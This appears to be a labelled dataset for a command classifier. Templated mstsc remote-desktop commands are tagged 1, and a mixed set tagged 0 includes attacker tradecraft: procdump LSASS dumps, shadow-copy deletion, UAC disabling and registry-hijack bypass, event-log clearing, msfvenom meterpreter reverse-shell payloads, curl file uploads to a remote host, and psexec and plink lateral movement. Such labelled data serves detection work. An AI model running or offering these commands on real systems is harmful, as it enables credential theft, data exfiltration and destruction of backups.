1	mstsc /v:${ip_address}
1	cmd /c "mstsc /v:${ip_address}"
1	powershell -c "mstsc /v:${ip_address}"
1	mstsc.exe /v:${ip_address}
1	cmd /c "mstsc.exe /v:${ip_address}"
1	powershell -c "mstsc.exe /v:${ip_address}"
1	mstsc /v:${ip_address} /f
1	cmd /c "mstsc /v:${ip_address} /f"
1	powershell -c "mstsc /v:${ip_address} /f"
1	mstsc.exe /v:${ip_address} /f
1	cmd /c "mstsc.exe /v:${ip_address} /f"
1	powershell -c "mstsc.exe /v:${ip_address} /f"
1	mstsc /v:${ip_address} /public
1	cmd /c "mstsc /v:${ip_address} /public"
1	powershell -c "mstsc /v:${ip_address} /public"
1	mstsc.exe /v:${ip_address} /public
1	cmd /c "mstsc.exe /v:${ip_address} /public"
1	powershell -c "mstsc.exe /v:${ip_address} /public"
1	mstsc /v:${ip_address} /f /public
1	cmd /c "mstsc /v:${ip_address} /f /public"
1	powershell -c "mstsc /v:${ip_address} /f /public"
1	mstsc.exe /v:${ip_address} /f /public
1	cmd /c "mstsc.exe /v:${ip_address} /f /public"
1	powershell -c "mstsc.exe /v:${ip_address} /f /public"
1	mstsc /v:${ip_address} /admin
1	cmd /c "mstsc /v:${ip_address} /admin"
1	powershell -c "mstsc /v:${ip_address} /admin"
1	mstsc.exe /v:${ip_address} /admin
1	cmd /c "mstsc.exe /v:${ip_address} /admin"
1	powershell -c "mstsc.exe /v:${ip_address} /admin"
1	mstsc /v:${ip_address} /f /admin
1	cmd /c "mstsc /v:${ip_address} /f /admin"
1	powershell -c "mstsc /v:${ip_address} /f /admin"
1	mstsc.exe /v:${ip_address} /f /admin
1	cmd /c "mstsc.exe /v:${ip_address} /f /admin"
1	powershell -c "mstsc.exe /v:${ip_address} /f /admin"
1	mstsc /v:${ip_address} /restrictedAdmin
1	cmd /c "mstsc /v:${ip_address} /restrictedAdmin"
1	powershell -c "mstsc /v:${ip_address} /restrictedAdmin"
1	mstsc.exe /v:${ip_address} /restrictedAdmin
1	cmd /c "mstsc.exe /v:${ip_address} /restrictedAdmin"
1	powershell -c "mstsc.exe /v:${ip_address} /restrictedAdmin"
1	mstsc /v:${ip_address} /f /restrictedAdmin
1	cmd /c "mstsc /v:${ip_address} /f /restrictedAdmin"
1	powershell -c "mstsc /v:${ip_address} /f /restrictedAdmin"
1	mstsc.exe /v:${ip_address} /f /restrictedAdmin
1	cmd /c "mstsc.exe /v:${ip_address} /f /restrictedAdmin"
1	powershell -c "mstsc.exe /v:${ip_address} /f /restrictedAdmin"
1	mstsc /v:${ip_address} /remoteGuard
1	cmd /c "mstsc /v:${ip_address} /remoteGuard"
1	powershell -c "mstsc /v:${ip_address} /remoteGuard"
1	mstsc.exe /v:${ip_address} /remoteGuard
1	cmd /c "mstsc.exe /v:${ip_address} /remoteGuard"
1	powershell -c "mstsc.exe /v:${ip_address} /remoteGuard"
1	mstsc /v:${ip_address} /f /remoteGuard
1	cmd /c "mstsc /v:${ip_address} /f /remoteGuard"
1	powershell -c "mstsc /v:${ip_address} /f /remoteGuard"
1	mstsc.exe /v:${ip_address} /f /remoteGuard
1	cmd /c "mstsc.exe /v:${ip_address} /f /remoteGuard"
1	powershell -c "mstsc.exe /v:${ip_address} /f /remoteGuard"
1	mstsc /v:${ip_address} /multimon
1	cmd /c "mstsc /v:${ip_address} /multimon"
1	powershell -c "mstsc /v:${ip_address} /multimon"
1	mstsc.exe /v:${ip_address} /multimon
0	nmap -p- -sC -sV -O -A ${ip_address} 2> error.log
0	powershell -c "ipconfig /all"
0	psexec.exe \\${ip_address} -accepteula -u ${username} -p ${password} -s ${command_to_execute}
0	certutil -encode -gmt ${source_file_path} ${destination_file_path}
0	reg ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_QWORD /d 0 /f
0	powershell -c "choco install -f 7zip"
0	7z a ${destination_file_path} ${source_file_path} -p
0	powershell -c "certutil -encode -Unicode -v -f error.txt encode.txt"
0	echo ${email_content} | mail -s ${email_subject} ${username}@${domain} 2> /dev/null
0	nmap -p- -sC -sV -O -A ${ip_address}
0	cmd /c "plink.exe -ssh ${username}@${ip_address} -l ${username} -pw ${password} -L 127.0.0.1:${local_port}:${ip_address}:${remote_port} -N"
0	powershell -c "choco install -y winscp"
0	cmd /c "procdump -ma lsass lsassdump.dmp"
0	cmd /c "choco install -f procdump"
0	cmd /c "Psexec64 \\${ip_address} -u ${username} -p ${password} -i ${command_to_execute}"
0	vssadmin Delete Shadows /All /quiet
0	cmd /c "wmic.exe os get Version"
0	cmd /c "msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=${ip_address} LPORT=${port} -f exe -o reverse.exe"
0	cmd /c "sdelete.exe -accepteula ${local_file_path}"
0	wmic /node:${ip_address} shadowcopy call create Volume=C:
0	cmd /c "arp.exe -g"
0	Psexec64.exe \\${ip_address} -u ${username} -p ${password} -i ${command_to_execute}
0	cmd /c "7z.exe a -slp ${destination_file_path} ${source_file_path} -p"
0	nmap -v ${ip_address} 2> /dev/null
0	powershell -c "curl -X POST http://${ip_address}/upload -F 'files=@${source_file_path}'"
0	taskkill /f /IM ${process_name} /T
0	psexec.exe \\${ip_address} -accepteula -u ${username} -p ${password} -i ${command_to_execute}
0	powershell -c "curl.exe -X POST http://${ip_address}/upload -H -F 'files=@${source_file_path}'"
0	cmd /c "taskkill /im ${process_name}"
0	Psexec64 \\${ip_address} -accepteula -u ${username} -p ${password} -i ${command_to_execute} -d
0	taskkill /im ${process_name} /T
0	curl.exe -v -X POST http://${ip_address}/upload -F files=@${source_file_path}
0	plink -ssh -l ${username} -pw ${password} -L 127.0.0.1:${local_port}:${ip_address}:${remote_port} -N
0	cmd /c "reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f"
0	powershell -c "choco install -f Megasync"
0	powershell -c "Psexec64 \\${ip_address} -u ${username} -p ${password} -s ${command_to_execute}"
0	wmic.exe os get OSArchitecture
0	cmd /c "netstat.exe -f"
0	cmd /c "reg.exe add hkcu\software\classes\mscfile\shell\open\command /ve /d ${command_to_execute} /f"
0	cmd /c "wevtutil.exe cl application"
0	certutil -encode -gmt ${source_file_path} ${destination_file_path}
0	powershell -c "procdump -accepteula -mm lsass lsassdump.dmp"
0	vssadmin Delete Shadows /All /quiet
0	reg add hkcu\software\classes\mscfile\shell\open\command /ve /d ${command_to_execute} /f
0	curl -X POST http://${ip_address}/upload -F "files=@${source_file_path}"
0	cmd /c "curl.exe -X POST -H -F 'file=@${source_file_path}' http://${ip_address}:${port}/upload"
0	powershell -c "psexec \\${ip_address} -accepteula -u ${username} -p ${password} -s ${command_to_execute} -d"
0	cmd /c "curl.exe -X POST -H -F file=@${source_file_path} http://${ip_address}:${port}/upload"
0	vssadmin.exe Delete Shadows /all /quiet
0	plink -ssh ${username}@${ip_address} -l ${username} -pw ${password} -L 127.0.0.1:${local_port}:${ip_address}:${remote_port} -N
0	powershell -c "taskkill.exe /F /im ${process_name}"
0	cmd /c "wevtutil.exe clear-log security"
0	cat email.txt | mpack -s ${email_subject} ${username}@${domain}
0	cmd /c "curl.exe -X POST http://${ip_address}/upload -H -F 'files=@${source_file_path}'"
0	plink.exe -ssh -l ${username} -pw ${password} -N -R ${ip_address}:${remote_port}:127.0.0.1:${local_port} ${ip_address}
0	msfvenom -p windows/meterpreter/reverse_https_proxy LHOST=${ip_address} LPORT=${port} -f exe -o reverse.exe
0	powershell -c "procdump -mm lsass.exe lsassdump.dmp"
0	cmd /c "wmic.exe os get Caption,Version"
0	echo ${email_content} | sendmail ${username}@${domain} 2> &1
0	powershell -c "sc stop ${service_name}"
0	plink.exe -ssh -l ${username} -pw ${password} -N -R ${ip_address}:${remote_port}:127.0.0.1:${local_port}
0	powershell -c "7z.exe a -slt -p ${destination_file_path} ${source_file_path}"
0	powershell -c "7z a -slp ${destination_file_path} ${source_file_path} -p${password}"
0	powershell -c "choco install -y Megasync"
